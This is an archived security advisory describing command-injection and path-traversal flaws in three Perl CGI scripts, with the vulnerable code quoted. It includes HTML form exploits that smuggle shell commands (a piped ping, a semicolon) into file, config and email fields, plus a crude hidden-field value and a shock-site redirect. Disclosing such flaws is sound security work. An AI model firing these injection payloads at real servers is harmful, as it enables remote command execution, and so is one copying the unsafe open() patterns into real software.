TUCoPS :: Web :: Apps :: thusband.htm

Tammie's HUSBAND scripts ad.cgi insecure input validation vulnerability 
Vulnerability

    Tammie's HUSBAND scripts

Affected

    Tammie's HUSBAND scripts

Description

    'rpc'  found  number  of  bugs  in  "Scripts by Tammie's HUSBAND".
    ad.cgi from  "Scripts by  Tammie's HUSBAND"  contains an  insecure
    input  validation   vulnerability.   Information   on  ad.cgi   is
    available at:

        http://www.conservatives.net/atheist/scripts/index.html?ads

    Code snippet:

        $filename = "$FORM{'file'}";
        $datafile = "$basedir" . "$filename";
        ...
        open (INFO, "$datafile");

    Exploit:

    <html>
    <form action="http://www.conservatives.net/someplace/ad.cgi" method=POST>
    <h1>ad.cgi exploit</h1>
    Command: <input type=text name=file value="../../../../../../../../bin/ping -c 5 www.foo.com|">
    <input type=submit value=run>
    </form>
    </html>

    everythingform.cgi  uses  a  hidden  field  'config'  to determine
    where to read configuration data from.

    Code snippit:

        ..
        $ConfigFile = $in{config};
        ..
         open(CONFIG, "$configdir$ConfigFile") || &Error("I can\'t open $ConfigFile in the ReadConfig subroutine. Reason: $!");

    Information regarding everythingform can be found at:

        http://www.conservatives.net/atheist/scripts/index.html?everythingform

    Sample exploit:

    <form action="http://www.conservatives.net/someplace/everythingform.cgi" method=POST>
    <h1>everythingform.cgi exploit</h1>
    Command: <input type=text name=config value="../../../../../../../../bin/ping -c 5 www.foobar.com|">
    <input type=hidden name=Name value="fuck the religious right">
    <input type=hidden name="e-mail" value="foo@bar.net">
    <input type=hidden name=FavoriteColor value=Black>
    <input type=submit value=run>
    </form>

    simplestmail.cgi is another Perl cgi written by "Tammie's HUSBAND"
    Leif Wright.  It's available from:

        http://www.conservatives.net/atheist/scripts/index.html?simplestmail

    The code is self explanatory:

        $youremail = $contents_by_name{'MyEmail'};
        open (MAIL, "|$mailprog $youremail") || die "Can't open $mailprog!\n";

    Exploitation is straight forward:

    <html>
    <form action="http://someplace/cgi-bin/simplestmail.cgi" method=POST>
    Command: <input type=text name=MyEmail value=";">
    <input type=hidden name=redirect value="http://goatse.cx">
    <input type=submit name=submit value="run">
    </form>
    </html>

Solution

    Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH